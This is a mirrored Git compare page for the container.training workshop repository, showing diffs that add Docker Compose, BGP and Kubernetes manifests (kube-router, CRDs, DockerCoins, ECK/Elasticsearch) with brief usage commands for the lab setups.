Mirror of https://github.com/jpetazzo/container.training.git
Synced 2026-02-15 10:09:56 +00:00

Compare commits (663 commits)
8dacf00bf3
454843b755
63e68ab720
46f0bc0dfb
16bb3f1847
fef3fa31fb
b844e40372
5b5d5946e8
af6705fb1e
bfd63c16c6
c506038682
7d8fdd43bd
adf0f53aab
49fe1b8e17
073a5f8c84
032803806d
f7b327a33a
d3526aac00
3736dd6e86
c03f199023
8ba9c2e41b
36d1199b70
56e09eef6d
15f71506b6
5eb8453597
65ee4e3885
ac801746eb
0af16b98c9
2fde58a3ee
38fec0b00d
627800ddd5
871aab23ad
8d7fa29a79
22f09c37a3
eacffe3cc5
d044f2bbd0
a3da2615ff
9a1ea0f1bd
67ac03e76e
38725cf3da
3e98148e3f
b988c28b41
583933c492
ebadc1ca59
7f85c645f0
ed5009c769
e2f3034a96
8933e6aa1b
784b2a3e4e
f3bbd6377b
04d3a7b360
a32df01165
ba323cb4e6
745a435a1a
db276af182
87462939d9
7d6ab6974d
ae606b9c40
da9921d68a
3e9a939578
328a2edaaf
1f826d7993
cff9cbdfbb
3ea6b730c8
1c6c76162f
52bafdb57e
c4d9e6b3e1
5160dd39a0
3c1220be83
6a814cf039
1385a1bae2
68a6546276
8a2ca450ee
6e8ac173e0
97e68ae185
148ddd5174
e8eb11e257
fe9b56572e
7281ca3ca0
34a17aa097
b37dd85eff
4811420d55
a824afec85
89d9fcb1c4
5b488fbe62
6d01a9d813
cb81469170
c595a337e4
03d2d0bc5d
2c46106792
291d2a6c92
f73fb92832
e9e2fa0e50
a0162d37f1
a61b69ad9a
3388db4272
d2d901302f
1fae4253bc
f7f5ab1304
7addacef22
0136391ab5
ed27ad1d1e
c15aa708df
5749348883
bc885f3dca
bbe35a3901
eb17b4c628
a4d50a5439
98d2b79c97
8320534a5c
74ece65947
7444f8d71e
c9bc417a32
7d4331477a
ff132fd728
4ec7b1d7f4
e08e7848ed
be6afa3e5e
c340d909de
b667cf7cfc
e04998e9cd
84198b3fdc
5c161d2090
0fc7c2316c
fb64c0d68f
23aaf7f58c
6cbcc4ae69
0b80238736
4c285b5318
2095a15728
13ba8cef9d
be2374c672
f96da2d260
5958874071
370bdf9aaf
381cd27037
c409c6997a
eb2e74f236
169d850fc7
96104193ba
5a5a08cf25
82b7b7ba88
8c4a0a3fce
f4f0fb0f23
8dfcb440c8
f3622d98fe
b1fc7580a1
ab77d89232
04f728c67a
5bbce4783a
889c79addb
c4b408621c
49df28d44f
46878ed6c7
b5b005b6d2
9e991d1900
ace911a208
ead027a62e
09c832031b
34fca341bc
af18c5ab9f
afa3a59461
1abfac419b
edd2f749c0
2365b8f460
c7a504dcb4
ffb15c8316
f7fbe1b056
4be1b40586
91fb2f167c
02dcb58f77
3a816568da
9a184c6d44
ba4ec23767
c690a02d37
6bbf8a123c
cede1a4c12
e24a1755ec
44e84c5f23
947ab97b14
45ea521acd
99d2e99cea
0d4b7d6c7e
45ac1768a3
f0d991cd02
4e1950821d
2668a73fb0
2d56d9f57c
b27f960483
50211dcc6e
35654762b3
a77fe701b7
dee48d950e
645d424a54
875c552029
c2eb0de99a
9efe1f3129
14b7670c7d
f20e0b1435
26317315b5
5bf39669e3
c06b680fed
ba34183774
abda9431ae
581635044b
b041a2f9ec
7fd8b7db2d
dcd91c46b7
076a68379d
741faed32e
9a9f7a3c72
a458c41068
ce6cdae80c
73f0d61759
0ae7d38b68
093e3ab5ab
be72fbe80a
560328327c
9f1d2581fc
ab1a360cdc
860907ccf0
ad4c86b3f4
8f7ca0d261
626e4a8e35
b21f61ad27
bac0d9febd
313df8f9ff
ef6a5f05f8
d71a636a9d
990a873e81
98836d85cf
c959a4c4a1
c3a796faef
56cc65daf2
a541e53c78
7a63dfb0cf
093cfd1c24
8492524798
12b625d4f6
a78e99d97e
161b8aed7d
4f1252d0b6
1b407cbc5e
dd6f3c9eee
d4afae54b8
730ef0f421
c1f9082fdc
1fcb223a1d
5e520dfbe5
91d3f025b0
79b8e5f2f0
f809faadb9
4e225fdaf5
36be4eaa9f
57aa25fda0
42ed6fc56a
5aedee5564
0a2879e1a5
3e87e69608
b572d06f82
2c0b4b15ba
f91e995e90
59c2ff1911
879e7f2ec9
ad4cc074c1
ab8b478648
68f35bd2ed
964b92d320
db961b486f
a90dcf1d9a
f4ef2bd6d4
baf428ebdb
3a87183a66
3f70ee2c2a
68a26ae501
2ef72a4dd8
f4e16dccc4
4c55336079
b22d3e3d21
7b8370dc12
db6d2c8188
eb02875bd0
4ba954cae4
84b691a89d
c1e9073781
6593f4ad42
bde7f75881
25c820c87a
39027675d5
f8e0de3519
3a512779b2
d987f21cba
1f08425437
f69c9853bb
c565dad43c
e48c23e4f4
eb04aacb5e
b0f01e018c
9504f81526
12ef2eb66e
e4311a3037
7309304ced
26c876174a
9775954b42
d4500eff5a
0ba6adb027
d3af9ff333
c9dc6fa7cb
485704a169
72fa8c366b
8ea4b23530
785a8178ca
0dfff26410
5b4debfd81
69f9cee6c9
4c44f3e690
b69119eed4
940694a2b0
c3de1049f1
116515d19b
098671ec20
51e77cb62c
e2044fc2b2
f795d67f02
6f6dc66818
0ae39339b9
e6b73a98f4
03657ea896
4106059d4a
2c0ed6ea2a
3557a546e1
d3dd5503cf
82f8f41639
dff8c1e43a
9deeddc83a
dc7c1e95ca
a4babd1a77
609756b4f3
c367ad1156
06aba6737a
b9c08613ed
da2264d1ca
66fbd7ee9e
a78bb4b2bf
9dbd995c85
b535d43b02
a77aabcf95
b42e4e6f80
1af958488e
2fe4644225
3d001b0585
e42d9be1ce
d794c8df42
85144c4f55
fba198d4d7
da8b4fb972
74c9286087
d4c3686a2a
9a66481cfd
f5d523d3c8
9296b375f3
6d761b4dcc
fada4e8ae7
dbcb4371d4
3f40cc25a2
aa55a5b870
f272df9aae
b92da2cf9f
fea69f62d6
627c3361a1
603baa0966
dd5a66704c
95b05d8a23
c761ce9436
020cfeb0ad
4c89d48a0b
e2528191cd
50710539af
0e7c05757f
6b21fa382a
1ff3b52878
307fd18f2c
ad81ae0109
11c8ded632
5413126534
ddcb02b759
ff111a2610
5a4adb700a
7c9f144f89
cde7c566f0
8b2a8fbab6
1e77f57434
2dc634e1f5
df185c88a5
f40b8a1bfa
ded5fbdcd4
038563b5ea
d929f5f84c
cd1dafd9e5
945586d975
aa6b74efcb
4784a41a37
0d551f682e
9cc422f782
287f6e1cdf
2d3ddc570e
82c26c2f19
6636f92cf5
ff4219ab5d
71cfade398
c44449399a
637c46e372
ad9f845184
3368e21831
46ce3d0b3d
41eb916811
1c76e23525
2b2d7c5544
84c233a954
0019b22f1d
6fe1727061
a4b23e3f02
d5fd297c2d
3ad1e89620
d1609f0725
ef70ed8006
5f75f04c97
38097a17df
afa7b47c7a
4d475334b5
59f2416c56
9c5fa6f15e
c1e6fe1d11
99adc846ba
1ee4c31135
6f655bff03
7fbabd5cc2
c1d4df38e5
8e6a18d5f7
d902f2e6e6
8ba825db54
1309409528
b3a9a017d9
3c6cbff913
48a5fb5c7a
ed11f089e1
461020300d
f4e4d13f68
5b2a5c1f05
fdf5a1311a
95e2128e7c
4a8cc82326
a4e50f6c6f
a85266c44c
5977b11f33
3351cf2d13
facb5997b7
b4d2a5769a
2cff684e79
ea3e19c5c5
d9c8f2bc57
304faff96b
852135df9a
9b4413f332
e5a7e15ef8
52be1aa464
6a644e53e0
3f8ec37225
cf3fae6db1
c9b85650cb
964057cd52
da13946ba0
f6d154cb84
1657503da1
af8441912e
e16c1d982a
1fb0ec7580
ad80914000
d877844a5e
195c08cb91
8a3dad3206
4f59e293ee
8753279603
d84c585fdc
b8f8ffa07d
4f2ecb0f4a
662b3a47a0
8325dcc6a0
42c1a93d5f
8d1737c2b3
8045215c63
ad20e1efe6
ae6a5a5800
0160d9f287
f0f3d70521
53cf52f05c
e280cec60f
c8047897e7
cc071b79c3
869f46060a
258c134421
c6d9edbf12
5fc62e8fd7
f207adfe13
8c2107fba9
d4096e9c21
5c89738ab6
893a84feb7
f807964416
2ea9cbb00f
8cd9a314d3
ede085cf48
bc349d6c4d
80d6b57697
5c2599a2b9
a6f6ff161d
6aaa8fab75
01042101a2
5afb37a3b9
995ea626db
a1adbb66c8
3212561c89
003a232b79
2770da68cd
c502d019ff
a07e50ecf8
46c6866ce9
fe95318108
65232f93ba
9fa7b958dc
a95e5c960e
5b87162e95
8c4914294e
7b9b9f527d
3c7f39747c
be67a742ee
40cd934118
556db65251
ff781a3065
8348d750df
9afa0acbf9
cb624755e4
523ca55831
f0b48935fa
abcc47b563
33e1bfd8be
2efc29991e
11387f1330
fe93dccbac
5fad84a7cf
22dd6b4e70
a3594e7e1e
7f74e5ce32
9e051abb32
3ebcfd142b
6c5d049c4c
072ba44cba
bc8a9dc4e7
b1ba881eee
337a5d94ed
43acccc0af
4a447c7bf5
b9de73d0fd
3f7675be04
b4bb9e5958
9a6160ba1f
1d243b72ec
c5c1ccaa25
b68afe502b
d18cacab4c
2faca4a507
d797ec62ed
a475d63789
dd3f2d054f
73594fd505
16a1b5c6b5
ff7a257844
77046a8ddf
3ca696f059
305db76340
b1672704e8
c058f67a1f
ab56c63901
a5341f9403
b2bdac3384
a2531a0c63
84e2b90375
9639dfb9cc
8722de6da2
f2f87e52b0
56ad2845e7
f23272d154
86e35480a4
1020a8ff86
20b1079a22
f090172413
e4251cfa8f
b6dd55b21c
53d1a68765
156ce67413
e372850b06
f543b54426
35614714c8
100c6b46cf
36ccaf7ea4
4a655db1ba
2a80586504
0a942118c1
2f1ad67fb3
4b0ac6d0e3
ac273da46c
7a6594c96d
657b7465c6
08059a845f
24e2042c9d
9771f054ea
5db4e2adfa
bde5db49a7
7c6b2730f5
7f6a15fbb7
d97b1e5944
1519196c95
f8629a2689
fadecd52ee
524d6e4fc1
51f5f5393c
f574afa9d2
4f49015a6e
f25d12b53d
78259c3eb6
adc922e4cd
f68194227c
29a3ce0ba2
e5fe27dd54
6016ffe7d7
7c94a6f689
5953ffe10b
3016019560
0d5da73c74
91c835fcb4
d01ae0ff39
63b85da4f6
2406e72210
32e1edc2a2
84225e982f
e76a06e942
0519682c30
91f7a81964
a66fcaf04c
9a0649e671
d23ad0cd8f
63755c1cd3
149cf79615
a627128570
91e3078d2e
31dd943141
3866701475
521f8e9889
49c3fdd3b2
4bb6a49ee0
cb407e75ab
27d4612449
43ab5f79b6
.gitignore (vendored, 19 lines changed)
@@ -1,13 +1,24 @@
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules

### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride

### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db
.gitpod.yml (new file, 1 line)
@@ -0,0 +1 @@
image: jpetazzo/shpod
@@ -39,7 +39,7 @@ your own tutorials.
 All these materials have been gathered in a single repository
 because they have a few things in common:

-- some [common slides](slides/common/) that are re-used
+- some [shared slides](slides/shared/) that are re-used
   (and updated) identically between different decks;
 - a [build system](slides/) generating HTML slides from
   Markdown source files;
@@ -199,7 +199,7 @@ this section is for you!
   locked-down computer, host firewall, etc.
 - Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
   can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
-  prevent you from loosing your place if you get disconnected from servers.
+  prevent you from losing your place if you get disconnected from servers.
   https://tmux.github.io
 - Forget to print "cards" and cut them up for handing out IP's.
 - Forget to have fun and focus on your students!
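
As a concrete illustration of the MOSH/tmux tip above, a possible session flow (hostnames are placeholders; assumes mosh and tmux are installed on the remote machine):

    $ mosh user@node1            # SSH-like login over UDP; tolerates roaming and packet loss
    $ tmux new -s workshop       # named session; your shells live inside it
    # ...wifi drops, laptop sleeps...
    $ mosh user@node1
    $ tmux attach -t workshop    # everything is exactly where you left it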
compose/frr-route-reflector/conf/bgpd.conf (new file, 9 lines)
@@ -0,0 +1,9 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout
compose/frr-route-reflector/conf/vtysh.conf (new empty file)
compose/frr-route-reflector/conf/zebra.conf (new file, 2 lines)
@@ -0,0 +1,2 @@
hostname frr
log stdout
compose/frr-route-reflector/docker-compose.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
version: "3"

services:
  bgpd:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
    restart: always

  zebra:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
    restart: always

  vtysh:
    image: ajones17/frr:662
    volumes:
    - ./conf:/etc/frr
    - ./run:/var/run/frr
    network_mode: host
    entrypoint: vtysh -c "show ip bgp"

  chmod:
    image: alpine
    volumes:
    - ./run:/var/run/frr
    command: chmod 777 /var/run/frr
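
Given the compose file above, one plausible way to start the route reflector and peek at its BGP table (service names come from the file; the docker-compose flags are standard):

    $ docker-compose up -d chmod zebra bgpd   # 'chmod' fixes /var/run/frr permissions first
    $ docker-compose run --rm vtysh           # one-shot run of 'vtysh -c "show ip bgp"'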
compose/kube-router-k8s-control-plane/docker-compose.yaml (new file, 29 lines)
@@ -0,0 +1,29 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.4.3
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
    "Edit the CLUSTER placeholder first. Then, remove this line.":

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-scheduler --master http://localhost:8080
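
A sketch of bringing this control plane up, assuming the CLUSTER placeholder is replaced (42 below is just an example value) and the tripwire line is deleted:

    $ sed -i 's/10.CLUSTER.0.0/10.42.0.0/' docker-compose.yaml   # pick a pod CIDR, remove the tripwire line too
    $ docker-compose up -d
    $ kubectl --server=http://localhost:8080 get namespaces      # API is published via the 'pause' service's port 8080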
compose/kube-router-k8s-control-plane/kuberouter.yaml (new file, 128 lines)
@@ -0,0 +1,128 @@
---
apiVersion: |+

    Make sure you update the line with --master=http://X.X.X.X:8080 below.
    Then remove this section from this YAML file and try again.

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-router-cfg
  namespace: kube-system
  labels:
    k8s-app: kube-router
data:
  cni-conf.json: |
    {
      "cniVersion":"0.3.0",
      "name":"mynet",
      "plugins":[
        {
          "name":"kubernetes",
          "type":"bridge",
          "bridge":"kube-bridge",
          "isDefaultGateway":true,
          "ipam":{
            "type":"host-local"
          }
        }
      ]
    }
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  labels:
    k8s-app: kube-router
  name: kube-router
  namespace: kube-system
spec:
  selector:
    matchLabels:
      k8s-app: kube-router
  template:
    metadata:
      labels:
        k8s-app: kube-router
      annotations:
        scheduler.alpha.kubernetes.io/critical-pod: ''
    spec:
      serviceAccountName: kube-router
      containers:
      - name: kube-router
        image: docker.io/cloudnativelabs/kube-router
        imagePullPolicy: Always
        args:
        - "--run-router=true"
        - "--run-firewall=true"
        - "--run-service-proxy=true"
        - "--master=http://X.X.X.X:8080"
        env:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: KUBE_ROUTER_CNI_CONF_FILE
          value: /etc/cni/net.d/10-kuberouter.conflist
        livenessProbe:
          httpGet:
            path: /healthz
            port: 20244
          initialDelaySeconds: 10
          periodSeconds: 3
        resources:
          requests:
            cpu: 250m
            memory: 250Mi
        securityContext:
          privileged: true
        volumeMounts:
        - name: lib-modules
          mountPath: /lib/modules
          readOnly: true
        - name: cni-conf-dir
          mountPath: /etc/cni/net.d
      initContainers:
      - name: install-cni
        image: busybox
        imagePullPolicy: Always
        command:
        - /bin/sh
        - -c
        - set -e -x;
          if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
            if [ -f /etc/cni/net.d/*.conf ]; then
              rm -f /etc/cni/net.d/*.conf;
            fi;
            TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
            cp /etc/kube-router/cni-conf.json ${TMP};
            mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
          fi
        volumeMounts:
        - mountPath: /etc/cni/net.d
          name: cni-conf-dir
        - mountPath: /etc/kube-router
          name: kube-router-cfg
      hostNetwork: true
      tolerations:
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
        operator: Exists
      - effect: NoSchedule
        key: node.kubernetes.io/not-ready
        operator: Exists
      volumes:
      - name: lib-modules
        hostPath:
          path: /lib/modules
      - name: cni-conf-dir
        hostPath:
          path: /etc/cni/net.d
      - name: kube-router-cfg
        configMap:
          name: kube-router-cfg
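
Once the API server above is reachable, a possible deployment flow for this DaemonSet (X.X.X.X must become the node's real address; 10.0.0.1 below is a made-up example):

    $ sed -i 's/X.X.X.X/10.0.0.1/' kuberouter.yaml   # also delete the leading 'apiVersion: |+' tripwire block
    $ kubectl --server=http://10.0.0.1:8080 apply -f kuberouter.yaml
    $ kubectl --server=http://10.0.0.1:8080 -n kube-system get pods -l k8s-app=kube-router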
compose/simple-k8s-control-plane/docker-compose.yaml (new file, 28 lines)
@@ -0,0 +1,28 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.4.3
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-controller-manager --master http://localhost:8080

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-scheduler --master http://localhost:8080
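
A quick smoke test for this minimal control plane; since no kubelet is attached, workloads get scheduled but never run (standard kubectl flags):

    $ docker-compose up -d
    $ kubectl --server=http://localhost:8080 get componentstatuses
    $ kubectl --server=http://localhost:8080 create deployment web --image=nginx
    $ kubectl --server=http://localhost:8080 get pods   # stays Pending: there is no node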
@@ -5,6 +5,3 @@ RUN gem install thin
 ADD hasher.rb /
 CMD ["ruby", "hasher.rb"]
 EXPOSE 80
-HEALTHCHECK \
-  --interval=1s --timeout=2s --retries=3 --start-period=1s \
-  CMD curl http://localhost/ || exit 1
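
For context on what this hunk removes: while a HEALTHCHECK like this is active, Docker continuously records a health status that can be read back with a standard inspect call (the container name is a placeholder):

    $ docker inspect --format '{{ .State.Health.Status }}' <container>   # starting / healthy / unhealthy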
@@ -2,14 +2,14 @@ version: "2"

 services:
   elasticsearch:
-    image: elasticsearch
+    image: elasticsearch:2
     # If you need to access ES directly, just uncomment those lines.
     #ports:
     #  - "9200:9200"
     #  - "9300:9300"

   logstash:
-    image: logstash
+    image: logstash:2
     command: |
       -e '
       input {
@@ -47,7 +47,7 @@ services:
       - "12201:12201/udp"

   kibana:
-    image: kibana
+    image: kibana:4
     ports:
     - "5601:5601"
     environment:
k8s/canary.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: whatever
  annotations:
    traefik.ingress.kubernetes.io/service-weights: |
      whatever: 90%
      whatever-new: 10%
spec:
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 80
      - path: /
        backend:
          serviceName: whatever-new
          servicePort: 80
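
One way to see the 90/10 split in action, assuming Traefik is the ingress controller (it is what interprets the service-weights annotation) and A.B.C.D is replaced by its address:

    $ for i in $(seq 100); do curl -s http://whatever.A.B.C.D.nip.io/; done | sort | uniq -c
    # expect roughly 90 responses served by 'whatever' and 10 by 'whatever-new'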
k8s/coffee-1.yaml (new file, 15 lines)
@@ -0,0 +1,15 @@
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  version: v1alpha1
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof
k8s/coffee-2.yaml (new file, 35 lines)
@@ -0,0 +1,35 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof
  versions:
  - name: v1alpha1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        properties:
          spec:
            required:
            - taste
            properties:
              taste:
                description: Subjective taste of that kind of coffee bean
                type: string
    additionalPrinterColumns:
    - jsonPath: .spec.taste
      description: Subjective taste of that kind of coffee bean
      name: Taste
      type: string
    - jsonPath: .metadata.creationTimestamp
      name: Age
      type: date
k8s/coffees.yaml (new file, 29 lines)
@@ -0,0 +1,29 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: arabica
spec:
  taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: robusta
spec:
  taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: liberica
spec:
  taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: excelsa
spec:
  taste: fruity
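
A plausible sequence to try the CRD and these resources; the TASTE column exists because of the additionalPrinterColumns defined in coffee-2.yaml:

    $ kubectl apply -f k8s/coffee-2.yaml
    $ kubectl apply -f k8s/coffees.yaml
    $ kubectl get coffees
    # illustrative output shape:
    # NAME       TASTE      AGE
    # arabica    strong     10s
    # excelsa    fruity     10s
    # liberica   smoky      10s
    # robusta    stronger   10s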
@@ -1,3 +1,33 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: consul
+rules:
+- apiGroups: [""]
+  resources:
+  - pods
+  verbs:
+  - get
+  - list
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: consul
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: consul
+subjects:
+- kind: ServiceAccount
+  name: consul
+  namespace: default
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: consul
+---
 apiVersion: v1
 kind: Service
 metadata:
@@ -24,6 +54,7 @@ spec:
       labels:
         app: consul
     spec:
+      serviceAccountName: consul
       affinity:
         podAntiAffinity:
           requiredDuringSchedulingIgnoredDuringExecution:
@@ -37,18 +68,11 @@ spec:
       terminationGracePeriodSeconds: 10
       containers:
       - name: consul
-        image: "consul:1.2.2"
-        env:
-        - name: NAMESPACE
-          valueFrom:
-            fieldRef:
-              fieldPath: metadata.namespace
+        image: "consul:1.6"
         args:
         - "agent"
         - "-bootstrap-expect=3"
-        - "-retry-join=consul-0.consul.$(NAMESPACE).svc.cluster.local"
-        - "-retry-join=consul-1.consul.$(NAMESPACE).svc.cluster.local"
-        - "-retry-join=consul-2.consul.$(NAMESPACE).svc.cluster.local"
+        - "-retry-join=provider=k8s label_selector=\"app=consul\""
         - "-client=0.0.0.0"
         - "-data-dir=/consul/data"
        - "-server"
k8s/dockercoins.yaml (new file, 160 lines)
@@ -0,0 +1,160 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  replicas: 1
  selector:
    matchLabels:
      app: hasher
  template:
    metadata:
      labels:
        app: hasher
    spec:
      containers:
      - image: dockercoins/hasher:v0.1
        name: hasher
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: hasher
  name: hasher
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: hasher
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: redis
  name: redis
spec:
  replicas: 1
  selector:
    matchLabels:
      app: redis
  template:
    metadata:
      labels:
        app: redis
    spec:
      containers:
      - image: redis
        name: redis
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: redis
  name: redis
spec:
  ports:
  - port: 6379
    protocol: TCP
    targetPort: 6379
  selector:
    app: redis
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: rng
  name: rng
spec:
  replicas: 1
  selector:
    matchLabels:
      app: rng
  template:
    metadata:
      labels:
        app: rng
    spec:
      containers:
      - image: dockercoins/rng:v0.1
        name: rng
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: rng
  name: rng
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: rng
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: webui
  name: webui
spec:
  replicas: 1
  selector:
    matchLabels:
      app: webui
  template:
    metadata:
      labels:
        app: webui
    spec:
      containers:
      - image: dockercoins/webui:v0.1
        name: webui
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: webui
  name: webui
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: webui
  type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: worker
  name: worker
spec:
  replicas: 1
  selector:
    matchLabels:
      app: worker
  template:
    metadata:
      labels:
        app: worker
    spec:
      containers:
      - image: dockercoins/worker:v0.1
        name: worker
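
To run the full DockerCoins stack and reach the web UI (the NodePort value is assigned by the cluster and will differ):

    $ kubectl apply -f k8s/dockercoins.yaml
    $ kubectl get service webui              # e.g. 80:3xxxx/TCP
    $ curl http://<any-node-address>:<nodeport>/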
k8s/eck-cerebro.yaml (new file, 69 lines)
@@ -0,0 +1,69 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  selector:
    matchLabels:
      app: cerebro
  template:
    metadata:
      labels:
        app: cerebro
    spec:
      volumes:
      - name: conf
        configMap:
          name: cerebro
      containers:
      - image: lmenezes/cerebro
        name: cerebro
        volumeMounts:
        - name: conf
          mountPath: /conf
        args:
        - -Dconfig.file=/conf/application.conf
        env:
        - name: ELASTICSEARCH_PASSWORD
          valueFrom:
            secretKeyRef:
              name: demo-es-elastic-user
              key: elastic

---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: cerebro
  name: cerebro
spec:
  ports:
  - port: 9000
    protocol: TCP
    targetPort: 9000
  selector:
    app: cerebro
  type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: cerebro
data:
  application.conf: |
    secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"

    hosts = [
      {
        host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
        name = "demo"
        auth = {
          username = "elastic"
          password = ${?ELASTICSEARCH_PASSWORD}
        }
      }
    ]
k8s/eck-elasticsearch.yaml (new file, 19 lines)
@@ -0,0 +1,19 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
  name: demo
  namespace: eck-demo
spec:
  http:
    tls:
      selfSignedCertificate:
        disabled: true
  nodeSets:
  - name: default
    count: 1
    config:
      node.data: true
      node.ingest: true
      node.master: true
      node.store.allow_mmap: false
  version: 7.5.1
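
Once the ECK operator has reconciled this resource, the superuser password lands in the demo-es-elastic-user secret (the same one the cerebro and filebeat manifests reference); a common way to fetch it and probe the cluster:

    $ PW=$(kubectl -n eck-demo get secret demo-es-elastic-user \
          -o go-template='{{.data.elastic | base64decode}}')
    $ kubectl -n eck-demo run -it --rm curl --image=curlimages/curl --restart=Never -- \
          curl -u elastic:$PW http://demo-es-http:9200/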
k8s/eck-filebeat.yaml (new file, 168 lines)
@@ -0,0 +1,168 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: eck-demo
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.inputs:
    - type: container
      paths:
        - /var/log/containers/*.log
      processors:
        - add_kubernetes_metadata:
            host: ${NODE_NAME}
            matchers:
            - logs_path:
                logs_path: "/var/log/containers/"

    # To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      node: ${NODE_NAME}
    #      hints.enabled: true
    #      hints.default_config:
    #        type: container
    #        paths:
    #          - /var/log/containers/*${data.kubernetes.container.id}.log

    processors:
      - add_cloud_metadata:
      - add_host_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: eck-demo
